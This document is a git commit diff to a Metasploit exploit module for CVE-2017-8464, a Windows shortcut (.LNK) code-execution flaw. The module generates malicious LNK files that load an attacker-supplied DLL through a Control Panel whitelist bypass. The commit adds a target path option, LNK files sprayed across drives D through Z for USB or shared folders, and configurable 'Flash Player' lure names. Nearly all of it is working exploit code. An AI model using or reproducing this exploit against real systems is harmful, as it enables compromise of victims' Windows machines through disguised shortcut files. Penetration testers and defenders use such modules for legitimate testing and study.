Update the CVE-2017-8464 module

zeroSteiner · zeroSteiner · commit f2f48cbc8fa2 · 2017-09-30T18:25:16.000-04:00
diff --git a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
@@ -17,18 +17,23 @@ def initialize(info = {})
         info,
         'Name'            => 'LNK Code Execution Vulnerability',
         'Description'     => %q{
-          This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL.
+          This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
+          that contain a dynamic icon, loaded from a malicious DLL.
 
           This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
           similar except an additional SpecialFolderDataBlock is included. The folder ID set
           in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass
           the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
           DLL file.
+
+          If not PATH is specified, the module will use drive letters D through Z so the files
+          may be placed in the root path of a drive such as a shared VM folder or USB drive.
         },
         'Author'          =>
           [
-            'Uncredited',   # vulnerability discovery
-            'Yorick Koster' # msf module
+            'Uncredited',      # vulnerability discovery
+            'Yorick Koster',   # msf module
+            'Spencer McIntyre' # msf module
           ],
         'License'         => MSF_LICENSE,
         'References'      =>
@@ -56,22 +61,24 @@ def initialize(info = {})
             [ 'Windows x64', { 'Arch' => ARCH_X64 } ],
             [ 'Windows x86', { 'Arch' => ARCH_X86 } ]
           ],
-        'DefaultTarget' => 0, # Default target is Automatic
-        'DisclosureDate' => 'Jun 13 2017'
+        'DefaultTarget'   => 0, # Default target is Automatic
+        'DisclosureDate'  => 'Jun 13 2017'
       )
     )
 
     register_options(
       [
         OptString.new('FILENAME', [false, 'The LNK file', 'Flash Player.lnk']),
         OptString.new('DLLNAME', [false, 'The DLL file containing the payload', 'FlashPlayerCPLApp.cpl']),
-        OptString.new('DRIVE', [false, 'Drive letter assigned to USB drive on victim\'s machine'])
+        OptString.new('PATH', [false, 'An explicit path to where the files will be hosted'])
       ]
     )
 
     register_advanced_options(
       [
-        OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true])
+        OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]),
+        OptString.new('LNK_COMMENT', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),
+        OptString.new('LNK_DISPLAY_NAME', [true, 'The display name to use in the generated LNK file', 'Flash Player'])
       ]
     )
   end
@@ -87,14 +94,14 @@ def exploit
     dll_path = store_file(dll, dll_name)
     print_status("#{dll_path} created, copy it to the root folder of the target USB drive")
 
-    if datastore['DRIVE']
-      lnk = generate_link("#{datastore['DRIVE'].split(':')[0]}:\\#{dll_name}")
+    if datastore['PATH']
+      lnk = generate_link("#{datastore['PATH'].chomp("\\")}\\#{dll_name}")
       lnk_filename = datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk"
       lnk_path = store_file(lnk, lnk_filename)
-      print_status("#{lnk_path} created, copy to the target USB drive")
+      print_status("#{lnk_path} created, copy to the target paths")
+
     else
-      # HACK: the vulnerability doesn't appear to work with UNC paths
-      # Create LNK files to different drives instead
+      # HACK: Create LNK files to different drives instead
       # Copying all the LNK files will likely trigger this vulnerability
       ('D'..'Z').each do |i|
         fname, ext = (datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk").split('.')
@@ -108,9 +115,10 @@ def exploit
   end
 
   def generate_link(path)
+    vprint_status("Generating LNK file to load: #{path}")
     path << "\x00"
-    display_name = "Flash Player\x00" # LNK Display Name
-    comment = "Manage Flash Player Settings\x00"
+    display_name = datastore['LNK_DISPLAY_NAME'].dup << "\x00" # LNK Display Name
+    comment = datastore['LNK_COMMENT'].dup << "\x00"
 
     # Control Panel Applet ItemID with our DLL
     cpl_applet = [
